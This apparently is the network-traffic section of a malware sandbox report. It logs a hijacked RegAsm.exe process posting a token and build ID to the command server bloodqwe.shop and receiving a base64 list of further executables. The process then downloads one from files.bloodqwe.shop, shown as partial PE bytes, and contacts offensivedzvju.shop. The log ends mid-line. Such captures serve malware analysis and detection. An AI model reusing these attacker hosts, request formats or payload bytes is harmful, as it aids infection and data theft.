2024-09-28 03:23:42 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------KKJKKJJKJEGIECAKJJEBCont
2024-09-28 03:23:43 UTC	544	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lF3WjcLZCA8J0K5i7dbIKcZdykEtl%2FtkaPOoRAYwWv9wpLyEVMJudQCnYSlZ3U8M46VUPzfQ5jADC4H%2FDIdJenLEK%2F69Jjb96N%2FAq99KVaZ5mUl8uly%2FwisIyRWxp5%2Bi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dc6eca780df-EWR
2024-09-28 03:23:43 UTC	198	IN	Data Raw: 63 30 0d 0a 4d 54 49 7a 4e 7a 59 31 4e 33 78 6f 64 48 52 77 63 7a 6f 76 4c 32 5a 70 62 47 56 7a 4c 6d 4a 73 62 32 39 6b 63 58 64 6c 4c 6e 4e 6f 62 33 41 76 62 47 52 74 63 79 38 32 4e 6d 59 33 4e 57 5a 6c 5a 57 4e 6c 4e 6a 4d 34 58 32 78 6b 62 57 63 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 4d 33 4e 6a 55 34 66 47 68 30 64 48 42 7a 4f 69 38 76 5a 6d 6c 73 5a 58 4d 75 59 6d 78 76 62 32 52 78 64 32 55 75 63 32 68 76 63 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6a 63 31 5a 6d 51 35 5a 47 4d 32 4e 7a 4e 66 64 6d 46 7a 5a 43 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a Data Ascii: c0MTIzNzY1N3xodHRwczovL2ZpbGVzLmJsb29kcXdlLnNob3AvbGRtcy82NmY3NWZlZWNlNjM4X2xkbWcuZXhlfDF8a2tra3wxMjM3NjU4fGh0dHBzOi8vZmlsZXMuYmxvb2Rxd2Uuc2hvcC9sZG1zLzY2Zjc1ZmQ5ZGM2NzNfdmFzZC5leGV8MXxra2trfA==
2024-09-28 03:23:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49735	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:43 UTC	97	OUT	GET /ldms/66f75feece638_ldmg.exe HTTP/1.1 Host: files.bloodqwe.shop Cache-Control: no-cache
2024-09-28 03:23:43 UTC	706	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:43 GMT Content-Type: application/octet-stream Content-Length: 380456 Connection: close Last-Modified: Sat, 28 Sep 2024 01:46:22 GMT ETag: "66f75fee-5ce28" X-Content-Type-Options: nosniff Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 5475 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLaeGhu65PE0SHAi3lCwGDuT0uchDOvrVeCOS6vhZiItDDsaghFDQlI%2BM6nH%2Bkut5AalNPxWTiAzkpw%2F05NE67XR099QiW8kQX%2BtrShNakW4dl4A7EKLz3kqEa6ij057e1UiyuPk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dcef9740ca6-EWR
2024-09-28 03:23:43 UTC	663	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 5e f7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 05 00 00 08 00 00 00 00 00 00 7e bc 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^f~ @ `
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 8e 04 9f dc bb d4 f4 f0 cb 11 fd b2 e3 ef 68 fa 08 68 2e 60 e5 50 ea 77 bf 73 97 de b1 3d e8 4a 5d e1 9b 7d 39 fa 2e 0e b8 bf 9f b8 cf 07 03 b1 87 bc 6b 27 45 0c 56 20 03 b9 08 e4 6b 0c a5 33 f6 12 6b 7b 1a 66 2b b6 8e 3f fb f8 50 8a 3a 2e cf 64 1d 58 d9 d1 87 43 3b 37 7c 12 80 68 2f 70 9a 26 e7 6b d2 b6 3c cc 2d 47 b0 0e c4 77 ac 3a 4e d3 a5 c0 92 31 55 09 36 53 d9 df b2 97 36 8a 79 cf 06 de 60 6d d2 18 6f ff 9d 2b 8b f0 d3 f4 c1 5a c8 1a cb 51 b5 fc 18 a8 16 4a 7b 92 57 20 fd 44 29 a1 81 0b 0c 74 71 62 06 16 95 7a 80 78 05 dd d6 8f 8e 23 9f cb 78 bd a5 2a 2f 76 c4 17 79 1d 04 0b d1 1c bd 91 3b d7 2b ad d6 a5 44 3f a9 cf c9 77 1f 54 71 c6 0d 4e 2d 14 41 4d cb 40 d7 fd 7e 48 49 3d 65 35 02 9a 39 46 9b dd d4 6b d6 c9 bf 96 7b 5f 82 ac 8e 04 0c cd 69 5b fc Data Ascii: hh.`Pws=J]}9.k'EV k3k{f+?P:.dXC;7\|h/p&k<-Gw:N1U6S6y`mo+ZQJ{W D)tqbzx#x*/vy;+D?wTqN-AM@~HI=e59Fk{_i[
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 55 cf 03 b5 d9 bc cc bd f2 3f f1 c5 d7 5b 43 19 21 57 d8 2d 7d 9c 07 ca 9a 6e 8c 97 ac ab 95 d1 c5 80 dd f8 fd 66 3a 75 13 f7 c5 b7 d1 19 56 ff f1 24 0a 36 95 77 6c b3 6a 70 45 db e6 32 8b 64 ae 38 8d 0e 7e 38 6d fb a2 24 21 0b 64 8c 56 48 e7 84 80 90 e5 70 a7 ff c0 9f 5c ac 23 24 e6 12 65 d0 10 56 50 94 c0 5a e1 7d 52 50 2d 80 dc e4 1b 94 b0 d2 3c a1 a0 0d 1c e4 57 25 25 cf f4 15 34 34 4e 3c ae 5c f1 59 6b 0b e2 ec cf 36 c2 0f 14 fc 53 76 4a 32 82 5d 6f 0c bc 1a 59 03 9b a1 1b 1e 55 33 66 c9 c6 a1 14 5c 88 3c cb 1a a9 d9 b8 0f b9 79 77 c2 34 cc eb 22 e7 45 32 85 c7 28 7d 65 26 1e e7 02 98 c3 f0 24 b0 eb 8e f4 b8 0e 96 59 5b 56 a2 44 1a 7a fe 13 61 5f 50 c8 81 54 e6 2a 1b 89 85 a5 42 ee 4c 2c ef df e2 75 42 ee 8b 98 1c 02 9e fb 20 11 54 4c 95 f9 43 ea 8b Data Ascii: U?[C!W-}nf:uV$6wljpE2d8~8m$!dVHp\#$eVPZ}RP-<W%%44N<\Yk6SvJ2]oYU3f\<yw4"E2(}e&$Y[VDza_PT*BL,uB TLC
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 0a b9 63 05 37 02 02 46 d8 ea 77 3c 15 f0 fe 1a 3d 0e fc 5f 1c 41 07 61 b2 fd a9 55 f6 3f 4f c2 85 00 2b 32 ad f1 1f 29 40 10 f7 39 bd c0 d2 7f da c7 2e c2 1b 82 e8 75 32 ac 8c d9 f6 b2 ac 50 80 37 c5 c2 b8 2c 66 74 44 a2 20 f7 d6 7a 17 56 74 f4 04 1e 86 7f a3 19 12 6d 37 f1 ff 5d 65 51 56 77 d8 44 f5 df c8 1c 1d 2f 70 cc d6 e8 41 4e 41 e6 b8 28 af 0f 3e 36 41 90 ed 98 ec b0 86 24 2a d0 50 f7 16 e3 11 94 8d b1 1a 8d 65 9c 22 e1 e7 52 bd b8 7a 63 c8 f5 6a 2d 80 1c c2 91 7b e2 22 e1 22 3e 9a 76 78 01 6c 86 58 1b 4f 2f 52 83 6d c1 32 bb ca 5d a0 c5 ad d9 af 14 91 62 2d 90 40 77 e2 9a 11 2e 10 34 36 41 16 96 10 1e 90 84 37 bc 2a a6 01 2c ef 22 38 94 c8 c6 c9 5c be 2e 19 34 f7 fb de fd fb 8b a7 bb 4b 15 66 bb 40 48 0b 4d 2d 46 ca 94 bb da c5 3b fe 48 7c 3f bf Data Ascii: c7Fw<=_AaU?O+2)@9.u2P7,ftD zVtm7]eQVwD/pANA(>6A$Pe"Rzcj-{"">vxlXO/Rm2]b-@w.46A7,"8\.4Kf@HM-F;H\|?
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 73 b5 c9 31 44 22 a2 b6 d0 31 d0 ed ac d1 f1 09 e6 0d 8c 9d af 55 d7 e7 2d b0 f9 a8 c9 40 09 93 ba 39 fd aa 56 d9 64 fd 2a 95 2c 21 a8 1e 30 41 6a 3d ed c3 9c 28 46 3b 20 e9 52 37 bc 05 76 b7 60 29 39 69 7d 5a 37 66 72 da fd 4a 9d 8e 2f c1 eb aa 06 9c b9 a6 c9 6e b0 5d 4e 2e db e6 4f 1c 91 28 fe 40 1a c5 59 39 cd c2 13 66 b7 a1 55 71 4c cc 04 1a 43 48 4b 32 28 3d 9a 1e 67 c6 21 bd 73 c1 3f 5f be 2c b0 a5 a1 5f f2 28 ca b5 31 cb 61 5a 80 09 86 7d 5d 82 9a 2e 0b 51 ab c7 b9 13 fe d8 a6 5a 37 e2 b9 cf ba c3 37 14 22 c0 27 b0 fa c0 9e 3f 03 dc 2c ac fb 8b f4 81 db 24 28 c9 af 25 c6 f2 8f 4f 41 bd 06 b3 85 eb ab b9 92 2b b3 e4 03 5e 13 59 4f c0 9a fd 98 69 64 a4 a1 98 5d 95 11 2e bd e1 f8 ac ab b2 de da a4 aa 1c 16 68 2f 3d 91 9b 29 bd 3a 5f d4 0d 5a 03 0e b5 Data Ascii: s1D"1U-@9Vd*,!0Aj=(F; R7v`)9i}Z7frJ/n]N.O(@Y9fUqLCHK2(=g!s?_,_(1aZ}].QZ77"'?,$(%OA+^YOid].h/=):_Z
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 1c 31 1c 61 f4 f8 3a a9 f1 12 f0 21 54 99 15 8c 7d ff 8f e0 0f 5e ad d7 bc 44 df 09 8d fb ca 2d 7f 8c b0 0c 7f 35 1b b7 43 1a 07 fa a1 01 2c cb 7d ce 8e d0 25 f6 08 57 81 62 5b 58 ab 56 9a f7 67 9f b0 6f df 91 67 28 32 ad 2d aa af 3a 53 63 91 c9 f2 e3 1d a2 39 14 4a dc 2f 3a 85 a0 89 c6 12 5d 4e 5e 84 85 8f 87 2f a8 e9 d9 e6 8c ff 50 ae 4f b2 51 95 b5 52 4c 63 4b 1b a4 2e 86 85 d2 9a 22 b6 0a 1b 6f 95 cd 14 2d 49 2f 4d a4 5a 04 e0 cc 51 c2 92 35 73 21 60 90 d9 8e 49 fc e3 2a a9 a9 f2 1b 0e a0 0f 89 03 4c b9 db bf 01 a9 47 5e 9a de 86 5d 49 3f 91 54 59 ab fe 9e 8e e2 f7 08 de 40 40 d2 19 24 a4 4c f9 dc 4a 9e 27 e0 dd 56 52 f8 d6 bc b4 98 69 22 8b 8b d2 d9 57 b4 0d 5b 91 5c ef 8c 7c 70 e1 37 56 b3 32 31 a3 e3 cc 33 af 9f 5c 82 11 a0 56 0a 42 9a c7 c6 18 eb Data Ascii: 1a:!T}^D-5C,}%Wb[XVgog(2-:Sc9J/:]N^/POQRLcK."o-I/MZQ5s!`I*LG^]I?TY@@$LJ'VRi"W[\\|p7V213\VB
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: ca c4 50 3d 4d ad 45 1b 71 68 e3 98 65 bf de fd 65 9b 46 07 d3 75 23 f8 f8 d0 05 a4 cc fd 37 50 d3 48 15 4a 0c a4 d7 e1 6e 86 14 7a 59 4f 06 8e b7 e7 61 61 6c 3d 2e 87 fc 99 c9 0c 04 aa 7b 63 ed ec b1 de 97 8f 88 3a f8 13 25 a2 39 c7 ec 19 5f 1a 24 b4 b6 53 00 92 92 61 61 04 1f 65 a7 4a e8 e8 36 e5 b8 8f 93 7f 43 c6 42 db 06 5a be 83 9d b9 3a 04 f7 7a 49 f2 86 10 9e 38 32 5e d8 9b a8 62 39 b8 fb f7 74 f8 5b 12 58 d5 af 9f 79 23 f9 0a 9f d2 2f e1 f2 65 c7 18 9d 43 a6 74 00 5b 58 12 14 4a be de f8 cc 30 af 6a b3 82 03 f2 8f cc 39 d2 03 ba de 5e 18 42 1b 8a be 45 9b 60 18 80 3a 66 c8 1f 2a 49 48 97 69 b1 9e ed 32 0f a8 5e c6 5e 48 8c 99 d7 70 e0 92 78 fa 74 59 c8 4f f5 d1 ed d7 c0 7b c5 a4 9b e7 c6 a0 ed ba a5 ac cf e3 5c 28 c4 d1 0c 2a a1 32 3a 58 2a 01 fd Data Ascii: P=MEqheeFu#7PHJnzYOaal=.{c:%9_$SaaeJ6CBZ:zI82^b9t[Xy#/eCt[XJ0j9^BE`:fIHi2^^HpxtYO{\(2:X*
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 9b 3f a9 19 7f 24 50 da 87 b3 59 74 77 5f ec 6f 1a e6 68 ea e7 17 6d 86 d7 c3 45 40 8a f9 76 fa 7f c3 38 28 26 03 99 3f 18 a7 67 b2 d1 2a 2a 43 75 c4 d6 ce bf 45 6b 41 1d e3 37 52 ec 66 f2 57 f0 9e 78 b9 e6 88 f6 78 14 6c 94 25 f7 88 68 cf 83 36 dd 2c b7 14 bb f7 7b a5 4c 30 7c 65 84 59 5f 9e 6c 55 38 f8 d6 eb 1d d4 03 ba 9c 46 9a 33 fe 70 69 18 fc 9d f8 46 7f fa 3a 47 c2 6e 09 ba 2b 8e 08 c8 82 68 ba 39 0a d1 39 9f 53 ab 8c dd b1 79 43 46 e9 7c 4e 39 3a 84 60 38 54 34 4b b1 07 79 a3 4e d9 d1 01 c7 14 77 3c de 4a 68 25 0a ad d2 03 bf fe 85 79 df 93 c1 c4 8f 7b 42 d6 55 35 a6 f8 55 19 78 50 8d ec 52 3f 4c c2 63 c4 d2 56 e0 1c 08 ea b6 f4 f8 15 46 28 ec 42 42 e0 3e 64 fd 18 b4 e2 f1 b5 d0 39 32 4f ed 7b dd 9a 38 a2 df 81 bc fc 25 ef ff fb d2 19 7c b0 c2 aa Data Ascii: ?$PYtw_ohmE@v8(&?g**CuEkA7RfWxxl%h6,{L0\|eY_lU8F3piF:Gn+h99SyCF\|N9:`8T4KyNw<Jh%y{BU5UxPR?LcVF(BB>d92O{8%\|
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: ec f8 83 9c de d7 3f 4c 90 6f 90 49 71 b5 c9 12 55 03 b0 34 87 6d ab 60 c7 4b 71 74 a6 20 22 10 6a f1 f8 98 27 5b 4f 3d 01 53 b2 de bb 35 92 53 d6 b1 d1 99 33 a3 e3 ce af 67 9d 32 b6 af 05 94 6c 6f 4e bc 27 6e d4 5e 69 81 d0 ac ea ed 83 2d 0f 0f 94 1d af d1 c0 bf 96 6d 28 74 14 51 94 22 81 d8 c1 71 62 ff a0 01 89 ff 80 f3 77 5b fd 14 4b 84 a3 07 97 0e d2 d3 6c 99 43 c4 8c c0 50 a6 31 2c 3e 5a 1b 9b 15 db d9 23 5e 31 7b a8 ea 62 36 2a f6 ec 8b 34 8a 8f db 90 73 d6 2a 6a a2 74 54 32 a9 6d 65 ec 03 b8 c8 8f b7 53 4c b6 a3 3e 4e 21 71 05 48 cb 22 d7 f2 75 1b 42 54 5e 01 1e f6 31 53 be 88 4a d7 15 df 74 b2 26 c5 ed 8f 68 ff e7 0b 1f f7 8e de c0 f0 4c 83 12 bb 76 a6 34 f9 8e 27 66 9c 0f 7f cd 68 f7 82 e3 bb be 4a 8a 59 c2 80 e3 e9 07 9d c7 de 3e 45 83 07 25 af Data Ascii: ?LoIqU4m`Kqt "j'[O=S5S3g2loN'n^i-m(tQ"qbw[KlCP1,>Z#^1{b64sjtT2meSL>N!qH"uBT^1SJt&hLv4'fhJY>E%
2024-09-28 03:23:43 UTC	1369	IN	Data Raw: 90 a2 7e 18 d4 8c 0f 27 a8 a6 c6 59 a9 02 0e a6 c0 0a 04 49 3d 10 b8 d6 99 85 60 95 2c 8c 13 db 26 12 ae eb 90 63 cc 47 9d a7 81 8c 6b 6f 8b 66 4c c2 b9 85 a3 45 16 32 56 c5 d3 bc 29 0d 29 77 f0 a7 54 b1 4f 0b 7a a2 73 a9 f3 63 b8 b6 6b 16 fa 61 a6 20 28 48 2a 4f 98 ef 9d 71 84 6d 0f ac 79 f0 c5 7b 93 39 fb 6d fa 1d e0 ee 88 f1 a5 9b a8 4b 1a 33 32 34 9c fd 12 d2 c5 b7 3f 17 a3 82 49 84 ec c8 33 00 11 f6 ae 56 fa 75 86 c4 02 d9 fa d0 8d 75 90 97 0f f9 3c 65 40 c8 e0 54 c8 5f 3d b2 8b e5 fc 2a e9 8e 0e a9 16 a9 18 3b 08 6b 30 5d a9 86 63 19 64 29 dd 8d e5 a5 f4 0f 4e 21 d8 5c 05 64 60 56 d3 ac 69 5c b7 ad 2d ff 21 82 16 b5 be 25 0c 69 99 24 71 07 88 aa d3 30 f7 ac 76 35 ad 83 ef 9a ec fc 46 a3 35 92 a9 16 56 1c fa d2 91 c1 89 7d 4a 24 65 23 ab f6 07 2a 35 Data Ascii: ~'YI=`,&cGkofLE2V))wTOzscka (HOqmy{9mK324?I3Vuu<e@T_=;k0]cd)N!\d`Vi\-!%i$q0v5F5V}J$e#*5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49736	172.67.167.90	443	7152	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:44 UTC	180	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: bloodqwe.shop Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-28 03:23:44 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 37 37 66 61 63 36 38 66 30 64 63 64 31 63 32 35 62 34 36 66 36 65 33 39 30 36 39 37 35 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 30 37 36 62 36 61 30 32 65 62 30 32 38 64 64 65 34 36 31 66 36 34 39 34 66 39 35 35 62 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"977fac68f0dcd1c25b46f6e39069759a------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="build_id"0076b6a02eb028dde461f6494f955b49------HIDAKFIJJKJJJKEBKJEHCont
2024-09-28 03:23:45 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C50DPNo%2FSkDjBuX2aEuGjAdV%2FJDQLQvyjKmmtKniTwqOhgwhmEMCzh2ketfserTZUifw4qymlZ7GvgEU1Wmeed5I7RcGpcuz7LL5KMLiw261bzCVmqTAQ9paKGMx%2BwNT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dd68bbc8c90-EWR
2024-09-28 03:23:45 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-09-28 03:23:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49737	188.114.97.3	443	2740	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 03:23:45 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-28 03:23:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-28 03:23:45 UTC	551	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 03:23:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwK9C0FQIHQhySK0f9Qrg62ya73Y%2BqiPccnKYvf8qt3s%2BPZy8ZY0zeGTV9Y24TX7XBtPPJsyqtPJs4rZBBYP%2FJz14oKpU4XfyVI566wHBfLU0kxk%2ByFJc1Fe2hP6zS0nKYACescT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca09dda5c7143ee-EWR
2024-09-28 03:23:45 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-28 03:23:45 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-28 03:23:45 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 49 57 48 6e 59 75 6f 66 53 6e 63 50 44 45 69 6d 78 35 74 69 78 52 64 77 76 66 6e 59 74 61 46 45 44 46 58 32 4d 4b 45 79 74 61 41 2d 31 37 32 37 34 39 33 38 32 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="IWHnYuofSncPDEimx5tixRdwvfnYtaFEDFX2MKEytaA-1727493825-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-28 03:23:45 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 